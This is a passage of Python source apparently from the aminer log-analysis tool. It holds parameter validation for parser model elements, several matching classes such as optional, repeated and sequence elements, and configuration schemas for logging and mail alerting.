@param consume_delimiter True if the delimiter character should also be consumed. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. @param children a list of child elements to be iterated through. @param fixed_data a non-escaped delimiter string to search for. @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. @param optional_element the element to be optionally matched. @param repeated_element the MatchElement to be repeated in the data. 
@param min_repeat the minimum number of repeated matches of the repeated_element. @param max_repeat the maximum number of repeated matches of the repeated_element. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. @param alphabet the allowed letters to match data. @param strict_mode If strict is set to true all keys must be defined. The parser will fail if the logdata has a json-key that is not defined in the key_parser_dict @param ignore_null ignore json-keys with values "null" """ allowed_kwargs = [ "date_format", "time_zone", "text_locale", "start_year", "max_time_jump_seconds", "value_sign_type", "value_pad_type", "exponent_type", "delimiter", "escape", "consume_delimiter", "value_model", "value_path", "branch_model_dict", "default_branch", "children", "fixed_data", "wordlist", "ipv6", "key_parser_dict", "optional_key_prefix", "nullable_key_prefix", "allow_all_fields", "optional_element", "repeated_element", "min_repeat", "max_repeat", "upper_case", "alphabet", "strict_mode", "ignore_null", "timestamp_scale" ] for argument, value in list(locals().items())[1:-1]: # skip self parameter and kwargs if value is not None: setattr(self, argument, value) for argument, value in kwargs.items(): # skip self parameter and kwargs if argument not in allowed_kwargs: msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) setattr(self, argument, value) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "date_format"): if not isinstance(self.date_format, bytes): msg = "date_format has to be of the type bytes." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.date_format) <= 1: msg = "At least one date_format specifier must be defined." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "text_locale") and self.text_locale is not None: if not isinstance(self.text_locale, str) and not isinstance(self.text_locale, tuple): msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(self.text_locale, tuple) and len(self.text_locale) != 2: msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) try: old_locale = locale.getdefaultlocale() if old_locale != self.text_locale: locale.setlocale(locale.LC_ALL, self.text_locale) msg = f"Changed time locale from {self.text_locale} to {''.join(self.text_locale)}." logging.getLogger(DEBUG_LOG_NAME).info(msg) except locale.Error: msg = f"text_locale {self.text_locale} is not installed!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise locale.Error(msg) if hasattr(self, "start_year") and self.start_year is not None and (not isinstance(self.start_year, int) or isinstance( self.start_year, bool)): msg = "start_year has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "max_time_jump_seconds"): if not isinstance(self.max_time_jump_seconds, int) or isinstance(self.max_time_jump_seconds, bool): msg = "max_time_jump_seconds has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_time_jump_seconds <= 0: msg = "max_time_jump_seconds must not be lower than 1 second." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_sign_type"): if not isinstance(self.value_sign_type, str): msg = f"value_sign_type must be of type string. Current type: {type(self.value_sign_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_sign_type == SIGN_TYPE_NONE: self.start_characters = set(b"0123456789") elif self.value_sign_type == SIGN_TYPE_OPTIONAL: self.start_characters = set(b"-0123456789") elif self.value_sign_type == SIGN_TYPE_MANDATORY: self.start_characters = set(b"+-") else: msg = f"Invalid value_sign_type {self.value_sign_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_pad_type"): self.pad_characters = b"" if not isinstance(self.value_pad_type, str): msg = f"value_pad_type must be of type string. Current type: {type(self.value_pad_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_pad_type == PAD_TYPE_NONE: pass elif self.value_pad_type == PAD_TYPE_ZERO: self.pad_characters = b"0" elif self.value_pad_type == PAD_TYPE_BLANK: self.pad_characters = b" " else: msg = f"Invalid value_pad_type {self.value_pad_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "exponent_type"): if not isinstance(self.exponent_type, str): msg = f"exponent_type must be of type string. Current type: {type(self.exponent_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.exponent_type not in [EXP_TYPE_NONE, EXP_TYPE_OPTIONAL, EXP_TYPE_MANDATORY]: msg = f"Invalid exponent_type {self.exponent_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "delimiter"): if not isinstance(self.delimiter, bytes): msg = "delimiter has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.delimiter) < 1: msg = "delimiter must not be empty." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "escape") and self.escape is not None: if not isinstance(self.escape, bytes): msg = "escape has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.escape) < 1: msg = "escape must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "consume_delimiter") and not isinstance(self.consume_delimiter, bool): msg = "consume_delimiter has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_model") and not isinstance(self.value_model, ModelElementInterface): msg = "value_model has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_path") and self.value_path is not None: if not isinstance(self.value_path, str): msg = "value_path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.value_path) < 1: msg = "value_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "branch_model_dict"): if not isinstance(self.branch_model_dict, dict): msg = "branch_model_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for val in self.branch_model_dict.values(): if not isinstance(val, ModelElementInterface): msg = "all branch_model_dict values have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "default_branch") and self.default_branch is not None and not isinstance( self.default_branch, ModelElementInterface): msg = "default_branch has to be of the type string or None." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "children"): if not isinstance(self.children, list): msg = "children has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in self.children: if not isinstance(child, ModelElementInterface): msg = "all children have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "fixed_data"): if not isinstance(self.fixed_data, bytes): msg = "fixed_data has to be of the type byte string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.fixed_data) < 1: msg = "fixed_data must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "wordlist"): if not isinstance(self.wordlist, list): msg = "wordlist has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.wordlist) < 1: msg = "wordlist must have at least one element." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for word in self.wordlist: if not isinstance(word, bytes): msg = "words from the wordlist must be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for test_pos, ref_word in enumerate(self.wordlist): for test_word in self.wordlist[test_pos + 1:]: if test_word.startswith(ref_word): msg = f"Word {repr(test_word)} would be shadowed by word {repr(ref_word)} at lower position" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "upper_case"): if not isinstance(self.upper_case, bool): msg = "upper_case has to be of the type bool." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.upper_case: self.hex_regex = re.compile(rb"[0-9A-F]+") else: self.hex_regex = re.compile(rb"[0-9a-f]+") if hasattr(self, "ipv6") and not isinstance(self.ipv6, bool): msg = "ipv6 has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "key_parser_dict") and not isinstance(self.key_parser_dict, dict): msg = "key_parser_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_key_prefix"): if not isinstance(self.optional_key_prefix, str): msg = "optional_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.optional_key_prefix) < 1: msg = "optional_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "nullable_key_prefix"): if not isinstance(self.nullable_key_prefix, str): msg = "nullable_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.nullable_key_prefix) < 1: msg = "nullable_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "optional_key_prefix") and hasattr(self, "nullable_key_prefix") and\ self.optional_key_prefix == self.nullable_key_prefix: msg = "optional_key_prefix must not be the same as nullable_key_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "allow_all_fields") and not isinstance(self.allow_all_fields, bool): msg = "allow_all_fields has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_element") and not isinstance(self.optional_element, ModelElementInterface): msg = "optional_element has to be of the type ModelElementInterface." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "repeated_element") and not isinstance(self.repeated_element, ModelElementInterface): msg = "repeated_element has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "min_repeat"): if not isinstance(self.min_repeat, int) or isinstance(self.min_repeat, bool): msg = "min_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.min_repeat < 0: msg = "min_repeat has to be >= 0." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "max_repeat"): if not isinstance(self.max_repeat, int) or isinstance(self.max_repeat, bool): msg = "max_repeat has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_repeat < 1 or self.min_repeat > self.max_repeat: msg = "max_repeat has to be >= 1 and max_repeat has to be bigger than min_repeat." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "alphabet"): if not isinstance(self.alphabet, bytes): msg = "alphabet has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.alphabet) < 1: msg = "alphabet must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "strict_mode") and not isinstance(self.strict_mode, bool): msg = "strict_mode has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "ignore_null") and not isinstance(self.ignore_null, bool): msg = "ignore_null has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) @abc.abstractmethod def get_match_element(self, path, match_context): """ Try to find a match on given data for this model element and all its children. 
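"""
This module defines a model element that is optional.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class OptionalMatchModelElement(ModelElementInterface):
    """
    This class defines a model element tries to match against a given model element.

    If that fails returns a zero length match anyway.
    """

    def __init__(self, element_id: str, optional_element: ModelElementInterface):
        """
        Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param optional_element the element to be optionally matched.
        @raises TypeError (via ModelElementInterface) if optional_element is not a ModelElementInterface.
        """
        super().__init__(element_id, optional_element=optional_element)
        # Kept only for compatibility with code that may inspect this attribute. get_match_element() no longer hands
        # this shared instance out: it used to overwrite .path on every call, so each zero-length match a caller had
        # retained (e.g. the per-repetition matches collected by RepeatedElementDataModelElement under
        # "<path>/<n>", or a cached ParserMatch dictionary) silently took the path of the most recent call.
        self.empty_match_element = MatchElement(f"None/{self.element_id}", b"", None, None)

    def get_id(self):
        """Get the element ID."""
        return self.element_id

    def get_child_elements(self):
        """Return all optional elements."""
        return [self.optional_element]

    def get_match_element(self, path: str, match_context):
        """
        Try to match the optional child at the current position of match_context.

        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against; it is
        advanced by the child on success and left untouched when the child does not match.
        @return a MatchElement wrapping the embedded child match, or a fresh zero-length MatchElement (empty match
        string, no match object, no children) when the child did not match.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        match = self.optional_element.get_match_element(current_path, match_context)
        if match is None:
            # A new object per call so that retained empty matches keep their own path.
            return MatchElement(current_path, b"", None, None)
        # The child consumed exactly the difference between the data before and after its call.
        consumed = start_data[:len(start_data) - len(match_context.match_data)]
        return MatchElement(current_path, consumed, consumed, [match])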
"""
This module defines a matching parser model element.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.MatchElement import MatchElement
from collections import deque


class ParserMatch:
    """
    Objects of this class store information about a complete model match.

    Unlike the MatchElement, this class also provides fields to store information commonly used when dealing with the match.
    """

    def __init__(self, match_element: MatchElement):
        """
        Initialize the match.

        @param match_element the root MatchElement from the parsing process.
        @raises TypeError if match_element is not a MatchElement; the message is also logged to DEBUG_LOG_NAME.
        """
        if not isinstance(match_element, MatchElement):
            msg = "match_element has to be of the type MatchElement."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.match_element = match_element
        # Built lazily by get_match_dictionary() and cached for the lifetime of this object.
        self.match_dictionary = None

    def get_match_element(self):
        """Return the matching element."""
        return self.match_element

    def get_match_dictionary(self):
        """
        Return a dictionary of all children matches.

        Every MatchElement reachable from the root (root included) is stored under its path. When several siblings share
        one path, each of them is stored under "<path>/<index>" and the bare path maps to the list of those siblings.
        The result is computed once and cached in self.match_dictionary.
        @return dict mapping match paths to MatchElement objects (or to a list of them for a duplicated sibling path).
        """
        if self.match_dictionary is not None:
            return self.match_dictionary
        # Iterative depth-first walk; each stack entry is one list of sibling MatchElements.
        stack = deque()
        stack.append([self.match_element])
        result_dict = {}
        while stack:
            match_list = stack.pop()
            # counter_dict: path -> None while the path is unique among these siblings, otherwise the number of
            # siblings with that path that have already been given an index.
            counter_dict = {}
            for test_match in match_list:
                if test_match.path in counter_dict.keys():  # skipcq: PYL-C0201
                    counter_dict[test_match.path] = 0
                    result_dict[test_match.path] = []
                else:
                    counter_dict[test_match.path] = None
            for test_match in match_list:
                path = test_match.path
                if counter_dict[path] is not None:
                    try:
                        # A sibling with an equal match_object (same type and equal value) was already indexed: reuse its
                        # index, so this element is stored under the same "<path>/<pos>" key and replaces the earlier entry.
                        pos = next(i for i, x in enumerate(result_dict[test_match.path]) if not isinstance(x, list) and isinstance(
                            test_match.match_object, type(x.match_object)) and test_match.match_object == x.match_object)
                        path += f"/{pos}"
                    except StopIteration:
                        # No equal sibling yet: take the next free index for this path.
                        path += "/%d" % counter_dict[path]
                    counter_dict[test_match.path] += 1
                    result_dict[test_match.path].append(test_match)
                result_dict[path] = test_match
                children = test_match.children
                if children is not None:
                    stack.append(children)
        self.match_dictionary = result_dict
        return result_dict

    def __str__(self):
        """Return the root match annotated with its matched data as one string."""
        return f'ParserMatch: {self.match_element.annotate_match(" ")}'
"""
This module defines a model element that repeats a number of times.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class RepeatedElementDataModelElement(ModelElementInterface):
    """Objects of this class match on repeats of a given element."""

    def __init__(self, element_id: str, repeated_element: ModelElementInterface, min_repeat: int = 1, max_repeat: int = 0x100000):
        """
        Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param repeated_element the MatchElement to be repeated in the data.
        @param min_repeat the minimum number of repeated matches of the repeated_element.
        @param max_repeat the maximum number of repeated matches of the repeated_element; it also bounds the number of
        child match attempts per call (at most max_repeat + 1).
        @raises TypeError/ValueError (via ModelElementInterface) for a non-int or negative min_repeat, a non-int
        max_repeat, max_repeat < 1 or min_repeat > max_repeat.
        """
        super().__init__(element_id, repeated_element=repeated_element, min_repeat=min_repeat, max_repeat=max_repeat)

    def get_match_element(self, path, match_context):
        """
        Find a suitable number of repeats.

        The child is matched repeatedly under "<path>/<element_id>/<n>" (n starting at 0) until it fails or max_repeat + 1
        attempts were made.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against; restored to its
        starting data when the repeat count is outside [min_repeat, max_repeat].
        @return a MatchElement holding all child matches, or None if fewer than min_repeat or more than max_repeat repeats
        were found.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        collected = []
        # Up to max_repeat + 1 attempts: one more than allowed, so that an excess repeat is detected below.
        for repeat_index in range(self.max_repeat + 1):
            child_match = self.repeated_element.get_match_element(f"{current_path}/{repeat_index}", match_context)
            if child_match is None:
                break
            collected.append(child_match)
        if not self.min_repeat <= len(collected) <= self.max_repeat:
            match_context.match_data = start_data
            return None
        consumed = start_data[:len(start_data) - len(match_context.match_data)]
        return MatchElement(current_path, consumed, consumed, collected)
"""
This module defines a model element that consists of a sequence of model elements that all have to match.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from typing import List
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class SequenceModelElement(ModelElementInterface):
    """This class defines an element to find matches that comprise matches of all given child model elements."""

    def __init__(self, element_id: str, children: List["ModelElementInterface"]):
        """
        Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param children a list of child elements to be iterated through.
        @raises TypeError/ValueError (via ModelElementInterface) if children is not a non-empty list of ModelElementInterface.
        """
        super().__init__(element_id, children=children)

    def get_match_element(self, path, match_context):
        """
        Try to find a match on given data for this model element and all its children.

        When a match is found, the match_context is updated accordingly; when any child fails, the context's match_data is
        restored to what it was on entry.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return the MatchElement holding all child matches in order, or None if model did not match.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        child_matches = self._match_children_in_order(current_path, match_context)
        if child_matches is None:
            match_context.match_data = start_data
            return None
        consumed_length = len(start_data) - len(match_context.match_data)
        consumed = start_data[:consumed_length]
        return MatchElement(current_path, consumed, consumed, child_matches)

    def _match_children_in_order(self, current_path, match_context):
        """Match every child in sequence; return the list of child matches, or None as soon as one child fails."""
        collected = []
        for child in self.children:
            child_match = child.get_match_element(current_path, match_context)
            if child_match is None:
                return None
            collected.append(child_match)
        return collected
"""
This module defines a model element for a variable amount of bytes.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class VariableByteDataModelElement(ModelElementInterface):
    """This class defines a model element that takes any string that only contains characters of a given alphabet."""

    def __init__(self, element_id: str, alphabet: bytes):
        """
        Initialize the ModelElement.

        @param element_id an identifier for the ModelElement which is shown in the path.
        @param alphabet the allowed letters to match data.
        @raises TypeError/ValueError (via ModelElementInterface) if alphabet is not a non-empty bytes object.
        """
        super().__init__(element_id, alphabet=alphabet)

    def get_match_element(self, path, match_context):
        """
        Find the maximum number of bytes matching the given alphabet.

        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against; advanced past the
        matched bytes on success.
        @return a match when at least one byte was found within alphabet, None otherwise.
        """
        data = match_context.match_data
        allowed = self.alphabet
        # Index of the first byte outside the alphabet; the whole remaining data matches when there is none.
        match_len = next((index for index, byte in enumerate(data) if byte not in allowed), len(data))
        if not match_len:
            return None
        match_data = data[:match_len]
        match_context.update(match_data)
        return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None)
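"""
This module defines a model element that takes any string up to the next white space.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class WhiteSpaceLimitedDataModelElement(ModelElementInterface):
    """This class defines a model element that represents a variable amount of characters delimited by a white space."""

    def get_match_element(self, path: str, match_context):
        """
        Find the maximum number of bytes before encountering whitespace or end of data.

        Only a space (0x20) and a horizontal tab (0x09) count as white space here; any other byte, including a newline,
        is consumed like ordinary data.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against; advanced past
        the matched bytes on success.
        @return a match when at least one byte was found, None otherwise.
        """
        data = match_context.match_data
        # Index of the first delimiter byte, or the whole remaining data when there is none.
        match_len = next((index for index, byte in enumerate(data) if byte in b" \t"), len(data))
        if match_len == 0:
            return None
        match_data = data[:match_len]
        match_context.update(match_data)
        return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None)


# BaseSchema: top-level configuration keys (cerberus-style rules: required/type/default/empty/min/max/regex).
{
    'LearnMode': {
        'required': False,
        'type': 'boolean'
    },
    'AminerUser': {
        'required': False,
        'type': 'string',
        'default': 'aminer',
        'empty': False
    },
    'AminerGroup': {
        'required': False,
        'type': 'string',
        'default': 'aminer',
        'empty': False
    },
    'RemoteControlSocket': {
        'required': False,
        'type': 'string',
        'empty': False
    },
    'Core.PersistenceDir': {
        'required': False,
        'type': 'string',
        'default': '/var/lib/aminer',
        'empty': False
    },
    'Core.LogDir': {
        'required': False,
        'type': 'string',
        'default': '/var/lib/aminer/log',
        'empty': False
    },
    'Core.PersistencePeriod': {
        'required': False,
        'type': 'integer',
        'default': 600,
        'min': 1
    },
    # Mail addresses: "<local>@<label>(.<label>)*" or "<alnum>@localhost". The previous pattern used an unescaped "."
    # between exactly two host labels, so it accepted any single character there and rejected hosts with more than
    # one dot (e.g. "soc@mail.example.com"). The restrictive character classes are deliberately kept.
    'MailAlerting.TargetAddress': {
        'required': False,
        'type': 'string',
        'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+(\\.[a-zA-Z0-9-]+)*$)|^[a-zA-Z0-9]+@localhost$',
        'default': 'root@localhost',
        'empty': False
    },
    'MailAlerting.FromAddress': {
        'required': False,
        'type': 'string',
        'regex': '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+(\\.[a-zA-Z0-9-]+)*$)|^[a-zA-Z0-9]+@localhost$',
        'default': 'root@localhost',
        'empty': False
    },
    'MailAlerting.SubjectPrefix': {
        'required': False,
        'type': 'string',
        'default': 'aminer Alerts:'
    },
    'MailAlerting.AlertGraceTime': {
        'required': False,
        'type': 'integer',
        'default': 0,
        'min': 0
    },
    'MailAlerting.EventCollectTime': {
        'required': False,
        'type': 'integer',
        'default': 10,
        'min': 0
    },
    'MailAlerting.MinAlertGap': {
        'required': False,
        'type': 'integer',
        'default': 600,
        'min': 0
    },
    'MailAlerting.MaxAlertGap': {
        'required': False,
        'type': 'integer',
        'default': 600,
        'min': 0
    },
    'MailAlerting.MaxEventsPerMessage': {
        'required': False,
        'type': 'integer',
        'default': 1000,
        'min': 0
    },
    'LogPrefix': {
        'required': False,
        'type': 'string',
    },
    # Every log resource must be a file:// or unix:// URL; both alternatives are anchored at the start.
    'LogResourceList': {
        'required': True,
        'type': 'list',
        'schema': {'type': 'string', 'regex': '^file://.+|^unix://.+', 'empty': False}
    },
    'Log.StatisticsPeriod': {
        'required': False,
        'type': 'integer',
        'default': 3600,
        'min': 0
    },
    'Log.StatisticsLevel': {
        'required': False,
        'type': 'integer',
        'default': 1,
        'min': 0,
        'max': 2
    },
    'Log.DebugLevel': {
        'required': False,
        'type': 'integer',
        'default': 1,
        'min': 0,
        'max': 2
    },
    'Log.RemoteControlLogFile': {
        'required': False,
        'type': 'string',
        'empty': False
    },
    'Log.StatisticsFile': {
        'required': False,
        'type': 'string',
        'empty': False
    },
    'Log.DebugFile': {
        'required': False,
        'type': 'string',
        'empty': False
    },
    'Log.Rotation.MaxBytes': {
        'required': False,
        'type': 'integer',
        'default': 104857600,  # 100 Megabytes
        'min': 1
    },
    'Log.Rotation.BackupCount': {
        'required': False,
        'type': 'integer',
        'default': 5,
        'min': 1
    },
    'Log.Encoding': {
        'required': False,
        'type': 'string',
        'empty': False
    },
    'Input': {
        'required': True,
        'type': 'dict',
        'schema': {
            'multi_source': {'type': 'boolean', 'required': False, 'default': False},
            'timestamp_paths': {'type': ['string', 'list'], 'empty': False},
            'adjust_timestamps': {'type': 'boolean', 'required': False, 'default': False},
            'sync_wait_time': {'type': 'integer', 'min': 1, 'default': 5},
            'eol_sep': {'type': 'string', 'required': False, 'default': '\n', 'empty': False},
            'json_format': {'type': 'boolean', 'required': False, 'default': False}
        }
    }
}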
# AnalysisNormalisationSchema: rules for entries of the "Analysis" list. This schema mainly supplies defaults and the
# 'analysistype' coercion for every analysis component; which keys are valid for a given component type is left to the
# separate validation schema.
{
    'Analysis': {
        'required': False,
        'type': 'list',
        'nullable': True,
        'schema': {
            'type': 'dict',
            'schema': {
                'id': {'type': 'string', 'nullable': True, 'default': None},
                'type': {'type': 'analysistype', 'coerce': 'toanalysistype', 'required': True},
                'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'labels': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'persistence_id': {'type': 'string', 'default': 'Default'},
                'output_logline': {'type': 'boolean', 'default': False},
                'learn_mode': {'type': 'boolean'},
                'num_windows': {'type': 'integer', 'required': True, 'default': 50},
                'min_anomaly_score': {'type': 'float', 'required': False, 'default': 1.1},
